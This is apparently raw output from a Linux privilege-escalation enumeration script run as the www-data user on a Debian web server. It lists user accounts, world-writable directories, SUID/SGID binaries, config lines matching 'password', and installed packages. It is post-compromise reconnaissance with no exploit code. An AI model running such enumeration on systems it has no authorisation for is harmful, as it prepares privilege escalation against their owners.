lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
[+] Current User
www-data
[+] Current User ID
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 40 Oct 4 11:06 /dev/mqueue
drwxrwxrwt 2 root root 40 Oct 4 14:06 /dev/shm
drwxrwxrwt 7 root root 4096 Oct 4 16:39 /tmp
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.X11-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.XIM-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.Test-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.font-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Mar 17 2016 /var/tmp
drwx-wx-wt 2 root root 4096 Oct 4 16:39 /var/lib/php5/sessions
drwxrwxrwt 5 root root 100 Oct 4 14:06 /run/lock
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 38868 Nov 19 2015 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
drwxrwsr-x 2 root mail 4096 Mar 17 2016 /var/mail
drwxrwsr-x 2 root staff 4096 Jan 17 2016 /var/local
drwxr-s--- 2 mysql adm 4096 Mar 17 2016 /var/log/mysql
drwxr-s--- 2 Debian-exim adm 4096 Mar 17 2016 /var/log/exim4
drwxr-sr-x 2 man root 4096 Mar 17 2016 /var/cache/man
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwxr-sr-x 1 root shadow 34424 Jan 9 2016 /sbin/unix_chkpwd
drwxr-sr-x 3 root systemd-journal 60 Oct 4 14:06 /run/log/journal
drwxr-s--- 2 root systemd-journal 60 Oct 4 14:06 /run/log/journal/41c5984e6ab94241b1052c2059fb4b2f
-rwsr-xr-x 1 root root 38740 Nov 19 2015 /usr/bin/newgrp
-rwsr-xr-x 1 root root 52344 Nov 19 2015 /usr/bin/chfn
-rwxr-sr-x 1 root ssh 419192 Jan 13 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwxr-sr-x 1 root mail 17880 Feb 11 2015 /usr/bin/lockfile
-rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab
-rwsr-xr-x 1 root root 53112 Nov 19 2015 /usr/bin/passwd
-rwxr-sr-x 1 root shadow 61232 Nov 19 2015 /usr/bin/chage
-rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 21964 Nov 19 2015 /usr/bin/expiry
-rwsr-sr-x 1 root mail 96192 Feb 11 2015 /usr/bin/procmail
-rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock
-rwsr-xr-x 1 root root 43576 Nov 19 2015 /usr/bin/chsh
-rwsr-xr-x 1 root root 78072 Nov 19 2015 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 5372 Feb 24 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 9540 Feb 11 2016 /usr/lib/pt_chown
-rwsr-xr-- 1 root messagebus 362672 Aug 2 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 562536 Jan 13 2016 /usr/lib/openssh/ssh-keysign
drwxrwsr-x 10 root staff 4096 Mar 17 2016 /usr/local
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/include
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/games
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/bin
drwxrwsr-x 3 root staff 4096 Mar 17 2016 /usr/local/lib
drwxrwsr-x 4 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/src
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/sbin
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/etc
drwxrwsr-x 8 root staff 4096 Mar 17 2016 /usr/local/share
drwxrwsr-x 3 root staff 4096 Mar 17 2016 /usr/local/share/emacs
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/emacs/site-lisp
drwxrwsr-x 6 root staff 4096 Mar 17 2016 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/fonts
drwxrwsr-x 7 root staff 4096 Mar 17 2016 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/ca-certificates
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/man
-rwsr-xr-x 1 root root 1085236 Mar 13 2016 /usr/sbin/exim4
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
/etc/exim4/exim4.conf.template:# Authenticators which rely on unencrypted clear text passwords don't
/etc/exim4/exim4.conf.template:# advertise unencrypted clear text password based authenticators on all
/etc/exim4/exim4.conf.template:# preferred over allowing clear text password based authenticators on
/etc/exim4/exim4.conf.template:# use), an authentication ID, and a password. The latter two appear as
/etc/exim4/exim4.conf.template:# valid username and password. In a real configuration you would typically
/etc/exim4/exim4.conf.template:# password are $auth1 and $auth2. Apart from that you can use the same
/etc/exim4/exim4.conf.template:# Authenticate against local passwords using sasl2-bin
/etc/exim4/exim4.conf.template:# # don't send system passwords over unencrypted connections
/etc/exim4/exim4.conf.template:# They get the passwords from CONFDIR/passwd.client, whose format is
/etc/exim4/exim4.conf.template:# Because AUTH PLAIN and AUTH LOGIN send the password in clear, we
/etc/exim4/exim4.conf.template:# clear text password authentication on all connections.
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/reportbug.conf:# Username and password for SMTP
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
Err?=(none)/Reinst-required (Status,Err:
Name Version Description
acl 2.2.52-2 Access control list utilities
acpi 1.7-1 displays information on ACPI devices
acpi-support-base 0.142-6 scripts for handling base ACPI events such as the power button
acpid 1:2.0.23-2 Advanced Configuration and Power Interface event daemon
adduser 3.113+nmu3 add and remove users and groups
apache2 2.4.10-10+deb8u4 Apache HTTP Server
apache2-bin 2.4.10-10+deb8u4 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.10-10+deb8u4 Apache HTTP Server (common files)
apache2-utils 2.4.10-10+deb8u4 Apache HTTP Server (utility programs for web servers)
apt 1.0.9.8.2 commandline package manager
apt-listchanges 2.85.13+nmu1 package change history notification tool
apt-utils 1.0.9.8.2 package management related utility programs
aptitude 0.6.11-1+b1 terminal-based package manager
aptitude-common 0.6.11-1 architecture independent files for the aptitude package manager
aptitude-doc-en 0.6.11-1 English manual for aptitude, a terminal-based package manager
at 3.1.16-1 Delayed job execution and batch processing
base-files 8+deb8u3 Debian base system miscellaneous files
base-passwd 3.5.37 Debian base system master password and group files
bash 4.3-11+b1 GNU Bourne Again SHell
bash-completion 1:2.1-4 programmable completion for the bash shell
bc 1.06.95-9 GNU bc arbitrary precision calculator language
bind9-host 1:9.9.5.dfsg-9+deb8u6 Version of 'host' bundled with BIND 9.X
binutils 2.25-5 GNU assembler, linker and binary utilities
bsd-mailx 8.1.2-0.20141216cvs-2 simple mail user agent
bsdmainutils 9.0.6 collection of more utilities from FreeBSD
bsdutils 1:2.25.2-6 basic utilities from 4.4BSD-Lite
busybox 1:1.22.0-9+deb8u1 Tiny utilities for small and embedded systems
bzip2 1.0.6-7+b3 high-quality block-sorting file compressor - utilities
ca-certificates 20141019+deb8u1 Common CA certificates
console-setup 1.123 console font and keymap setup program
console-setup-linux 1.123 Linux specific part of console-setup
coreutils 8.23-4 GNU core utilities
cpio 2.11+dfsg-4.1+deb8u1 GNU cpio -- a program to manage archives of files
cpp 4:4.9.2-2 GNU C preprocessor (cpp)
cpp-4.9 4.9.2-10 GNU C preprocessor
cron 3.0pl1-127+deb8u1 process scheduling daemon
dash 0.5.7-4+b1 POSIX-compliant shell
dbus 1.8.20-0+deb8u1 simple interprocess messaging system (daemon and utilities)
dc 1.06.95-9 GNU dc arbitrary precision reverse-polish calculator
debconf 1.5.56 Debian configuration management system
debconf-i18n 1.5.56 full internationalization support for debconf
debian-archive-keyring 2014.3 GnuPG archive keys of the Debian archive
debian-faq 5.0.3 Debian Frequently Asked Questions
debianutils 4.4+b1 Miscellaneous utilities specific to Debian
dictionaries-common 1.23.17 spelling dictionaries - common utilities
diffutils 1:3.3-1+b1 File comparison utilities
discover 2.1.2-7 hardware identification system
discover-data 2.2013.01.11 Data lists for Discover hardware detection system
dmidecode 2.12-3 SMBIOS/DMI table decoder
dmsetup 2:1.02.90-2.2 Linux Kernel Device Mapper userspace library
dnsutils 1:9.9.5.dfsg-9+deb8u6 Clients provided with BIND
doc-debian 6.2 Debian Project documentation and other documents
docutils-common 0.12+dfsg-1 text processing system for reStructuredText - common data
docutils-doc 0.12+dfsg-1 text processing system for reStructuredText - documentation
dpkg 1.17.26 Debian package management system
e2fslibs:i386 1.42.12-1.1 ext2/ext3/ext4 file system libraries
e2fsprogs 1.42.12-1.1 ext2/ext3/ext4 file system utilities
eject 2.1.5+deb1+cvs20081104-13.1 ejects CDs and operates CD-Changers under Linux
emacsen-common 2.0.8 Common facilities for all emacsen
exim4 4.84.2-1 metapackage to ease Exim MTA (v4) installation
exim4-base 4.84.2-1 support files for all Exim MTA (v4) packages
exim4-config 4.84.2-1 configuration for the Exim MTA (v4)
exim4-daemon-light 4.84.2-1 lightweight Exim MTA (v4) daemon
file 1:5.22+15-2+deb8u1 Determines file type using "magic" numbers
findutils 4.4.2-9+b1 utilities for finding files--find, xargs
fontconfig 2.11.0-6.3 generic font configuration library - support binaries
fontconfig-config 2.11.0-6.3 generic font configuration library - configuration
fonts-dejavu-core 2.34-1 Vera font family derivate with additional characters
ftp 0.17-31 classical file transfer client
gcc 4:4.9.2-2 GNU C compiler
gcc-4.8-base:i386 4.8.4-1 GCC, the GNU Compiler Collection (base package)
gcc-4.9 4.9.2-10 GNU C compiler
gcc-4.9-base:i386 4.9.2-10 GCC, the GNU Compiler Collection (base package)
geoip-database 20150317-1 IP lookup command line tools that use the GeoIP library (country database)
gettext-base 0.19.3-2 GNU Internationalization utilities for the base system
gnupg 1.4.18-7 GNU privacy guard - a free PGP replacement
gnupg-agent 2.0.26-6 GNU privacy guard - password agent
gnupg2 2.0.26-6 GNU privacy guard - a free PGP replacement (new v2.x)
gpgv 1.4.18-7 GNU privacy guard - signature verification tool
grep 2.20-4.1 GNU grep, egrep and fgrep
groff-base 1.22.2-8 GNU troff text-formatting system (base system components)
grub-common 2.02~beta2-22+deb8u1 GRand Unified Bootloader (common files)
grub-pc 2.02~beta2-22+deb8u1 GRand Unified Bootloader, version 2 (PC/BIOS version)
grub-pc-bin 2.02~beta2-22+deb8u1 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
grub2-common 2.02~beta2-22+deb8u1 GRand Unified Bootloader (common files for version 2)
gzip 1.6-4 GNU compression utilities
hicolor-icon-theme 0.13-1 default fallback theme for FreeDesktop.org icon themes
host 1:9.9.5.dfsg-9+deb8u6 Transitional package
hostname 3.15 utility to set/show the host name or domain name
iamerican 3.3.02-6 American English dictionary for ispell (standard version)
ibritish 3.3.02-6 British English dictionary for ispell (standard version)
ienglish-common 3.3.02-6 Common files for British and American ispell dictionaries
ifupdown 0.7.53.1 high level tools to configure network interfaces
info 5.2.0.dfsg.1-6 Standalone GNU Info documentation browser
init 1.22 System-V-like init utilities - metapackage
init-system-helpers 1.22 helper tools for all init systems
initramfs-tools 0.120 generic modular initramfs generator
initscripts 2.88dsf-59 scripts for initializing and shutting down the system
insserv 1.14.0-5 boot sequence organizer using LSB init.d script dependency information
install-info 5.2.0.dfsg.1-6 Manage installed documentation in info format
installation-report 2.58 system installation report
iproute2 3.16.0-2 networking and traffic control tools
iptables 1.4.21-2+b1 administration tools for packet filtering and NAT
iputils-ping 3:20121221-5+b2 Tools to test the reachability of network hosts
isc-dhcp-client 4.3.1-6+deb8u2 DHCP client for automatically obtaining an IP address
isc-dhcp-common 4.3.1-6+deb8u2 common files used by all of the isc-dhcp packages
iso-codes 3.57-1 ISO language, territory, currency, script codes and their translations
ispell 3.3.02-6 International Ispell (an interactive spelling corrector)
kbd 1.15.5-2 Linux console font and keytable utilities
keyboard-configuration 1.123 system-wide keyboard preferences
klibc-utils 2.0.4-2 small utilities built with klibc for early boot
kmod 18-3 tools for managing Linux kernel modules
krb5-locales 1.12.1+dfsg-19+deb8u2 Internationalization support for MIT Kerberos
laptop-detect 0.13.7 attempt to detect a laptop
less 458-3 pager program similar to more
libacl1:i386 2.2.52-2 Access control list shared library
libaio1:i386 0.3.110-1 Linux kernel AIO access library - shared library
libalgorithm-c3-perl 0.09-1 Perl module for merging hierarchies using the C3 algorithm
libapache2-mod-php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (Apache 2 module)
libapr1:i386 1.5.1-3 Apache Portable Runtime Library
libaprutil1:i386 1.5.4-1 Apache Portable Runtime Utility Library
libaprutil1-dbd-sqlite3:i386 1.5.4-1 Apache Portable Runtime Utility Library - SQLite3 Driver
libaprutil1-ldap:i386 1.5.4-1 Apache Portable Runtime Utility Library - LDAP Driver
libapt-inst1.5:i386 1.0.9.8.2 deb package format runtime library
libapt-pkg4.12:i386 1.0.9.8.2 package management runtime library
libarchive-extract-perl 0.72-1 generic archive extracting module
libasan1:i386 4.9.2-10 AddressSanitizer -- a fast memory error detector
libasprintf0c2:i386 0.19.3-2 GNU library to use fprintf and friends in C++
libassuan0:i386 2.1.2-2 IPC library for the GnuPG components
libatk1.0-0:i386 2.14.0-1 ATK accessibility toolkit
libatk1.0-data 2.14.0-1 Common files for the ATK accessibility toolkit
libatomic1:i386 4.9.2-10 support library providing __atomic built-in functions
libattr1:i386 1:2.4.47-2 Extended attribute shared library
libaudit-common 1:2.4-1 Dynamic library for security auditing - common files
libaudit1:i386 1:2.4-1+b1 Dynamic library for security auditing
libauthen-sasl-perl 2.1600-1 Authen::SASL - SASL Authentication framework
libavahi-client3:i386 0.6.31-5 Avahi client library
libavahi-common-data:i386 0.6.31-5 Avahi common data files
libavahi-common3:i386 0.6.31-5 Avahi common library
libbind9-90 1:9.9.5.dfsg-9+deb8u6 BIND9 Shared Library used by BIND
libblkid1:i386 2.25.2-6 block device id library
libboost-iostreams1.55.0:i386 1.55.0+dfsg-3 Boost.Iostreams Library
libbsd0:i386 0.7.0-2 utility functions from BSD systems - shared library
libbz2-1.0:i386 1.0.6-7+b3 high-quality block-sorting file compressor library - runtime
libc-bin 2.19-18+deb8u3 GNU C Library: Binaries
libc-dev-bin 2.19-18+deb8u3 GNU C Library: Development binaries
libc6:i386 2.19-18+deb8u3 GNU C Library: Shared libraries
libc6-dev:i386 2.19-18+deb8u3 GNU C Library: Development Libraries and Header Files
libc6-i686:i386 2.19-18+deb8u3 GNU C Library: Shared libraries [i686 optimized]
libcairo2:i386 1.14.0-2.1 Cairo 2D vector graphics library
libcap-ng0:i386 0.7.4-2 An alternate POSIX capabilities library
libcap2:i386 1:2.24-8 POSIX 1003.1e capabilities (library)
libcap2-bin 1:2.24-8 POSIX 1003.1e capabilities (utilities)
libcgi-fast-perl 1:2.04-1 CGI subclass for work with FCGI
libcgi-pm-perl 4.09-1 module for Common Gateway Interface applications
libcilkrts5:i386 4.9.2-10 Intel Cilk Plus language extensions (runtime)
libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors
libclass-c3-perl 0.26-1 pragma for using the C3 method resolution order
libclass-c3-xs-perl 0.13-2+b1 Perl module to accelerate Class::C3
libclass-isa-perl 0.36-5 report the search path for a class's ISA tree
libcloog-isl4:i386 0.18.2-1+b2 Chunky Loop Generator (runtime library)
libcomerr2:i386 1.42.12-1.1 common error description library
libcpan-meta-perl 2.142690-1 Perl module to access CPAN distributions metadata
libcryptsetup4:i386 2:1.6.6-5 disk encryption support - shared library
libcups2:i386 1.7.5-11+deb8u1 Common UNIX Printing System(tm) - Core library
libcurl3-gnutls:i386 7.38.0-4+deb8u3 easy-to-use client-side URL transfer library (GnuTLS flavour)
libcwidget3:i386 0.5.17-2 high-level terminal interface library for C++ (runtime files)
libdata-optlist-perl 0.109-1 module to parse and validate simple name/value option pairs
libdata-section-perl 0.200006-1 module to read chunks of data from a module's DATA section
libdatrie1:i386 0.2.8-1 Double-array trie library
libdb5.3:i386 5.3.28-9 Berkeley v5.3 Database Libraries [runtime]
libdbd-mysql-perl 4.028-2+b1 Perl5 database interface to the MySQL database
libdbi-perl 1.631-3+b1 Perl Database Interface (DBI)
libdbus-1-3:i386 1.8.20-0+deb8u1 simple interprocess messaging system (library)
libdebconfclient0:i386 0.192 Debian Configuration Management System (C-implementation library)
libdevmapper1.02.1:i386 2:1.02.90-2.2 Linux Kernel Device Mapper userspace library
libdiscover2 2.1.2-7 hardware identification library
libdns-export100 1:9.9.5.dfsg-9+deb8u6 Exported DNS Shared Library
libdns100 1:9.9.5.dfsg-9+deb8u6 DNS Shared Library used by BIND
libedit2:i386 3.1-20140620-2 BSD editline and history libraries
libencode-locale-perl 1.03-1 utility to determine the locale encoding
libestr0 0.1.9-1.1 Helper functions for handling strings (lib)
libevent-2.0-5:i386 2.0.21-stable-2 Asynchronous event notification library
libexpat1:i386 2.1.0-6+deb8u1 XML parsing C library - runtime library
libfcgi-perl 0.77-1+b1 helper module for FastCGI
libffi6:i386 3.1-2+b2 Foreign Function Interface library runtime
libfile-listing-perl 6.04-1 module to parse directory listings
libfont-afm-perl 1.20-1 Font::AFM - Interface to Adobe Font Metrics files
libfontconfig1:i386 2.11.0-6.3 generic font configuration library - runtime
libfreetype6:i386 2.5.2-3+deb8u1 FreeType 2 font engine, shared library files
libfuse2:i386 2.9.3-15+deb8u2 Filesystem in Userspace (library)
libgc1c2:i386 1:7.2d-6.4 conservative garbage collector for C and C++
libgcc-4.9-dev:i386 4.9.2-10 GCC support library (development files)
libgcc1:i386 1:4.9.2-10 GCC support library
libgcrypt20:i386 1.6.3-2+deb8u1 LGPL Crypto library - runtime library
libgdbm3:i386 1.8.3-13.1 GNU dbm database routines (runtime version)
libgdk-pixbuf2.0-0:i386 2.31.1-2+deb8u4 GDK Pixbuf library
libgdk-pixbuf2.0-common 2.31.1-2+deb8u4 GDK Pixbuf library - data files
libgeoip1:i386 1.6.2-4 non-DNS IP-to-country resolver library
libglib2.0-0:i386 2.42.1-1 GLib library of C routines
libglib2.0-data 2.42.1-1 Common files for GLib library
libgmp10:i386 2:6.0.0+dfsg-6 Multiprecision arithmetic library
libgnutls-deb0-28:i386 3.3.8-6+deb8u3 GNU TLS library - main runtime library
libgnutls-openssl27:i386 3.3.8-6+deb8u3 GNU TLS library - OpenSSL wrapper
libgomp1:i386 4.9.2-10 GCC OpenMP (GOMP) support library
libgpg-error0:i386 1.17-3 library for common error values and messages in GnuPG components
libgpgme11:i386 1.5.1-6 GPGME - GnuPG Made Easy (library)
libgpm2:i386 1.20.4-6.1+b2 General Purpose Mouse - shared library
libgraphite2-3:i386 1.3.6-1~deb8u1 Font rendering engine for Complex Scripts -- library
libgssapi-krb5-2:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
libgtk2.0-0:i386 2.24.25-3 GTK+ graphical user interface library
libgtk2.0-bin 2.24.25-3 programs for the GTK+ graphical user interface library
libgtk2.0-common 2.24.25-3 common files for the GTK+ graphical user interface library
libharfbuzz0b:i386 0.9.35-2 OpenType text shaping engine (shared library)
libhogweed2:i386 2.7.1-5 low level cryptographic library (public-key cryptos)
libhtml-form-perl 6.03-1 module that represents an HTML form element
libhtml-format-perl 2.11-1 module for transforming HTML into various formats
libhtml-parser-perl 3.71-1+b3 collection of modules that parse HTML text documents
libhtml-tagset-perl 3.20-2 Data tables pertaining to HTML
libhtml-template-perl 2.95-1 module for using HTML templates with Perl
libhtml-tree-perl 5.03-1 Perl module to represent and create HTML syntax trees
libhttp-cookies-perl 6.01-1 HTTP cookie jars
libhttp-daemon-perl 6.01-1 simple http server class
libhttp-date-perl 6.02-1 module of date conversion routines
libhttp-message-perl 6.06-1 perl interface to HTTP style messages
libhttp-negotiate-perl 6.00-2 implementation of content negotiation
libicu52:i386 52.1-8+deb8u3 International Components for Unicode
libidn11:i386 1.29-1+b2 GNU Libidn library, implementation of IETF IDN specifications
libintl-perl 1.23-1 Uniforum message translations system compatible i18n library
libio-html-perl 1.001-1 open an HTML file with automatic charset detection
libio-socket-ip-perl 0.32-1 module for using IPv4 and IPv6 sockets in a protocol-independent way
libio-socket-ssl-perl 2.002-2+deb8u1 Perl module implementing object oriented interface to SSL sockets
libio-string-perl 1.08-3 Emulate IO::File interface for in-core strings
libirs-export91 1:9.9.5.dfsg-9+deb8u6 Exported IRS Shared Library
libisc-export95 1:9.9.5.dfsg-9+deb8u6 Exported ISC Shared Library
libisc95 1:9.9.5.dfsg-9+deb8u6 ISC Shared Library used by BIND
libisccc90 1:9.9.5.dfsg-9+deb8u6 Command Channel Library used by BIND
libisccfg-export90 1:9.9.5.dfsg-9+deb8u6 Exported ISC CFG Shared Library
libisccfg90 1:9.9.5.dfsg-9+deb8u6 Config File Handling Library used by BIND
libisl10:i386 0.12.2-2 manipulating sets and relations of integer points bounded by linear constraints
libitm1:i386 4.9.2-10 GNU Transactional Memory Library
libjasper1:i386 1.900.1-debian1-2.4+deb8u1 JasPer JPEG-2000 runtime library
libjbig0:i386 2.1-3.1 JBIGkit libraries
libjpeg62-turbo:i386 1:1.3.1-12 libjpeg-turbo JPEG runtime library
libjson-c2:i386 0.11-4 JSON manipulation library - shared library
libk5crypto3:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - Crypto Library
libkeyutils1:i386 1.5.9-5+b1 Linux Key Management Utilities (library)
libklibc 2.0.4-2 minimal libc subset for use with initramfs
libkmod2:i386 18-3 libkmod shared library
libkrb5-3:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries
libkrb5support0:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - Support library
libksba8:i386 1.3.2-1 X.509 and CMS support library
liblcms2-2:i386 2.6-3+b3 Little CMS 2 color management library
libldap-2.4-2:i386 2.4.40+dfsg-1+deb8u2 OpenLDAP libraries
liblocale-gettext-perl 1.05-8+b1 module using libc functions for internationalization in Perl
liblockfile-bin 1.09-6 support binaries for and cli utilities based on liblockfile
liblockfile1:i386 1.09-6 NFS-safe locking library
liblog-message-perl 0.8-1 powerful and flexible message logging mechanism
liblog-message-simple-perl 0.10-2 simplified interface to Log::Message
liblogging-stdlog0:i386 1.0.4-1 easy to use and lightweight logging library
liblognorm1:i386 1.0.1-3 Log normalizing library
liblua5.1-0:i386 5.1.5-7.1 Shared library for the Lua interpreter version 5.1
liblwp-mediatypes-perl 6.02-1 module to guess media type for a file or a URL
liblwp-protocol-https-perl 6.06-2 HTTPS driver for LWP::UserAgent
liblwres90 1:9.9.5.dfsg-9+deb8u6 Lightweight Resolver Library used by BIND
liblzma5:i386 5.1.1alpha+20120614-2+b3 XZ-format compression library
libmagic1:i386 1:5.22+15-2+deb8u1 File type determination library using "magic" numbers
libmailtools-perl 2.13-1 Manipulate email in perl programs
libmnl0:i386 1.0.3-5 minimalistic Netlink communication library
libmodule-build-perl 0.421000-2 framework for building and installing Perl modules
libmodule-pluggable-perl 5.1-1 module for giving modules the ability to have plugins
libmodule-signature-perl 0.73-1+deb8u2 module to manipulate CPAN SIGNATURE files
libmount1:i386 2.25.2-6 device mounting library
libmpc3:i386 1.0.2-1 multiple precision complex floating-point library
libmpfr4:i386 3.1.2-2 multiple precision floating-point computation
libmro-compat-perl 0.12-1 mro::* interface compatibility for Perls < 5.9.5
libmysqlclient18:i386 5.5.47-0+deb8u1 MySQL database client library
libncurses5:i386 5.9+20140913-1+b1 shared libraries for terminal handling
libncursesw5:i386 5.9+20140913-1+b1 shared libraries for terminal handling (wide character support)
libnet-http-perl 6.07-1 module providing low-level HTTP connection client
libnet-smtp-ssl-perl 1.01-3 Perl module providing SSL support to Net::SMTP
libnet-ssleay-perl 1.65-1+b1 Perl module for Secure Sockets Layer (SSL)
libnetfilter-acct1:i386 1.0.2-1.1 Netfilter acct library
libnettle4:i386 2.7.1-5 low level cryptographic library (symmetric and one-way cryptos)
libnewt0.52:i386 0.52.17-1+b1 Not Erik's Windowing Toolkit - text mode windowing with slang
libnfnetlink0:i386 1.0.1-3 Netfilter netlink library
libnfsidmap2:i386 0.25-5 NFS idmapping library
libonig2:i386 5.9.5-3.2 Oniguruma regular expressions library
libp11-kit0:i386 0.20.7-1 Library for loading and coordinating access to PKCS#11 modules - runtime
libpackage-constants-perl 0.04-1 List constants defined in a package
libpam-modules:i386 1.1.8-3.1+deb8u1 Pluggable Authentication Modules for PAM
libpam-modules-bin 1.1.8-3.1+deb8u1 Pluggable Authentication Modules for PAM - helper binaries
libpam-runtime 1.1.8-3.1+deb8u1 Runtime support for the PAM library
libpam0g:i386 1.1.8-3.1+deb8u1 Pluggable Authentication Modules library
libpango-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpangocairo-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpangoft2-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpaper-utils 1.1.24+nmu4 library for handling paper characteristics (utilities)
libpaper1:i386 1.1.24+nmu4 library for handling paper characteristics
libparams-util-perl 1.07-2+b1 Perl extension for simple stand-alone param checking functions
libparse-debianchangelog-perl 1.2.0-1.1 parse Debian changelogs and output them in other formats
libpci3:i386 1:3.2.1-3 Linux PCI Utilities (shared library)
libpcre3:i386 2:8.35-3.3+deb8u2 Perl 5 Compatible Regular Expression Library - runtime files
